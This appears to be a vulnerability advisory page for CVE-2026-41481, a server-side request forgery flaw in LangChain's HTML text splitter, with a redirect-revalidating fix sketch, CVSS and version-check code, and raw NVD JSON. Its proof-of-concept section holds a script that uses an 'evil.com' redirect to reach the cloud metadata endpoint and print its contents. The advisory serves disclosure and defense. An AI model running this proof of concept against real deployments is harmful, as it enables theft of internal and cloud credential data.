Security Vulnerability Report
CVE-2026-41481 CVSS 6.5 MEDIUM

CVE-2026-41481

Published: 2026-04-24 21:16:19
Last Modified: 2026-04-28 15:43:14

Description

LangChain is a framework for building agents and LLM-powered applications. Prior to langchain-text-splitters 1.1.2, HTMLHeaderTextSplitter.split_text_from_url() validated the initial URL using validate_safe_url() but then performed the fetch with requests.get() with redirects enabled (the default). Because redirect targets were not revalidated, a URL pointing to an attacker-controlled server could redirect to internal, localhost, or cloud metadata endpoints, bypassing SSRF protections. The response body is parsed and returned as Document objects to the calling application code. Whether this constitutes a data exfiltration path depends on the application: if it exposes Document contents (or derivatives) back to the requester who supplied the URL, sensitive data from internal endpoints could be leaked. Applications that store or process Documents internally without returning raw content to the requester are not directly exposed to data exfiltration through this issue. This vulnerability is fixed in 1.1.2.
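
The mechanism described above (validate once, then follow redirects blindly) can be contrasted with a loop that revalidates every hop. The following is a minimal sketch of that idea, not the actual patch shipped in 1.1.2. The names `is_safe_url`, `fetch_revalidating`, and `simulated_transport` are hypothetical; `is_safe_url` is a simplified stand-in for `validate_safe_url()` that only inspects literal hosts and does not resolve DNS names, which a real check would also need to do.

```python
import ipaddress
from typing import Callable, Optional, Tuple
from urllib.parse import urljoin, urlsplit

# (status code, Location header or None, response body)
Response = Tuple[int, Optional[str], str]

REDIRECT_CODES = {301, 302, 303, 307, 308}


def is_safe_url(url: str) -> bool:
    """Hypothetical stand-in for validate_safe_url(); checks literal hosts only."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return False
    if host == "localhost" or host.endswith(".localhost"):
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: a real validator would resolve it and check the addresses.
        return True
    # Rejects loopback, private, and link-local ranges such as 169.254.0.0/16.
    return ip.is_global


def fetch_revalidating(
    url: str, fetch_once: Callable[[str], Response], max_hops: int = 5
) -> str:
    """Follow redirects manually, validating every hop before requesting it."""
    for _ in range(max_hops + 1):
        if not is_safe_url(url):
            raise ValueError(f"blocked unsafe URL: {url}")
        status, location, body = fetch_once(url)
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)  # resolve relative Location headers
            continue
        return body
    raise ValueError("too many redirects")


def simulated_transport(url: str) -> Response:
    """Fake single-request transport so the sketch runs without network access."""
    if url == "http://evil.example/redirect_to_metadata":
        return (302, "http://169.254.169.254/latest/meta-data/", "")
    return (200, None, "<h1>ok</h1>")
```

With the `requests` library, `fetch_once` could wrap `requests.get(url, allow_redirects=False, timeout=10)` and return the status code, the `Location` header, and the response text, so that no redirect is followed before it has passed the check.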

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
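
As a worked check, the 6.5 base score can be reproduced from the vector using the CVSS v3.1 base equations. The sketch below is illustrative only: the function names are hypothetical, and it handles Scope: Unchanged vectors like this one, nothing more.

```python
import math

# CVSS v3.1 metric weights (PR values are those for Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(x: float) -> float:
    """Round up to one decimal place, as defined in the CVSS v3.1 specification."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector: str):
    """Return (base score, impact subscore, exploitability subscore)."""
    fields = dict(part.split(":") for part in vector.split("/")[1:])
    if fields["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {metric: WEIGHTS[metric][fields[metric]] for metric in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0, impact, exploitability
    return roundup(min(impact + exploitability, 10)), impact, exploitability


score, impact, exploitability = base_score(
    "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
)
print(score, round(impact, 1), round(exploitability, 1))
```

For this vector the impact subscore is 6.42 × 0.56 ≈ 3.6 and the exploitability subscore is 8.22 × 0.85 × 0.77 × 0.85 × 0.62 ≈ 2.8; their sum, about 6.43, rounds up to 6.5.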

Configurations (Affected Products)

cpe:2.3:a:langchain:langchain-text-splitters:*:*:*:*:*:*:*:* - VULNERABLE
langchain-text-splitters < 1.1.2
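
One way to check whether an environment falls in the affected range is to compare the installed distribution version against 1.1.2. This is a rough sketch using only the standard library; the helper names are hypothetical, and the parser ignores pre-release suffixes (so `1.1.2rc1` is treated as `1.1.2`), which a proper version library would handle more carefully.

```python
from importlib.metadata import PackageNotFoundError, version
from typing import Optional, Tuple

FIXED_RELEASE = (1, 1, 2)  # first fixed version, per the advisory


def parse_release(ver: str) -> Tuple[int, ...]:
    """Extract the leading numeric components, e.g. '1.1.2' -> (1, 1, 2)."""
    parts = []
    for piece in ver.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def is_affected(installed: str) -> bool:
    """True if the given version string is below the fixed release."""
    return parse_release(installed) < FIXED_RELEASE


def installed_version(dist: str = "langchain-text-splitters") -> Optional[str]:
    """Return the installed version of the distribution, or None if absent."""
    try:
        return version(dist)
    except PackageNotFoundError:
        return None


if __name__ == "__main__":
    found = installed_version()
    if found is None:
        print("langchain-text-splitters is not installed")
    else:
        status = "affected" if is_affected(found) else "not affected"
        print(f"langchain-text-splitters {found}: {status}")
```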

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC concept for CVE-2026-41481.
# This script demonstrates how an attacker might trigger the SSRF.
# It requires a vulnerable version of langchain-text-splitters (< 1.1.2).
from langchain_text_splitters import HTMLHeaderTextSplitter

# The attacker controls 'evil.com' and configures it to redirect
# requests to an internal metadata service (e.g., AWS IMDS).
attacker_controlled_url = "http://evil.com/redirect_to_metadata"


def exploit_ssrf():
    try:
        # Initialize the splitter. headers_to_split_on is a required argument;
        # the header choice here is arbitrary.
        splitter = HTMLHeaderTextSplitter(headers_to_split_on=[("h1", "Header 1")])

        # The vulnerable function validates 'attacker_controlled_url' (passes),
        # but follows the redirect to http://169.254.169.254/latest/meta-data/
        print(f"[*] Attempting to split text from URL: {attacker_controlled_url}")

        # In vulnerable versions, this triggers the SSRF.
        docs = splitter.split_text_from_url(attacker_controlled_url)

        print("[+] Request successful. Data retrieved:")
        for doc in docs:
            # If the app prints this back, data is exfiltrated.
            print(doc.page_content)
    except Exception as e:
        print(f"[-] Exploit failed or error occurred: {e}")


if __name__ == "__main__":
    exploit_ssrf()

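References

https://github.com/langchain-ai/langchain/security/advisories/GHSA-fv5p-p927-qmxr (Mitigation, Vendor Advisory)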

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-41481",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-24T21:16:19.490",
    "lastModified": "2026-04-28T15:43:13.700",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "LangChain is a framework for building agents and LLM-powered applications. Prior to langchain-text-splitters\n 1.1.2, HTMLHeaderTextSplitter.split_text_from_url() validated the initial URL using validate_safe_url() but then performed the fetch with requests.get() with redirects enabled (the default). Because redirect targets were not revalidated, a URL pointing to an attacker-controlled server could redirect to internal, localhost, or cloud metadata endpoints, bypassing SSRF protections. The response body is parsed and returned as Document objects to the calling application code. Whether this constitutes a data exfiltration path depends on the application: if it exposes Document contents (or derivatives) back to the requester who supplied the URL, sensitive data from internal endpoints could be leaked. Applications that store or process Documents internally without returning raw content to the requester are not directly exposed to data exfiltration through this issue. \nThis vulnerability is fixed in 1.1.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-918"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:langchain:langchain-text-splitters:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.1.2",
                "matchCriteriaId": "6B5FD4DD-C579-4824-8988-4C702E1B2D24"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-fv5p-p927-qmxr",
        "source": "[email protected]",
        "tags": ["Mitigation", "Vendor Advisory"]
      }
    ]
  }
}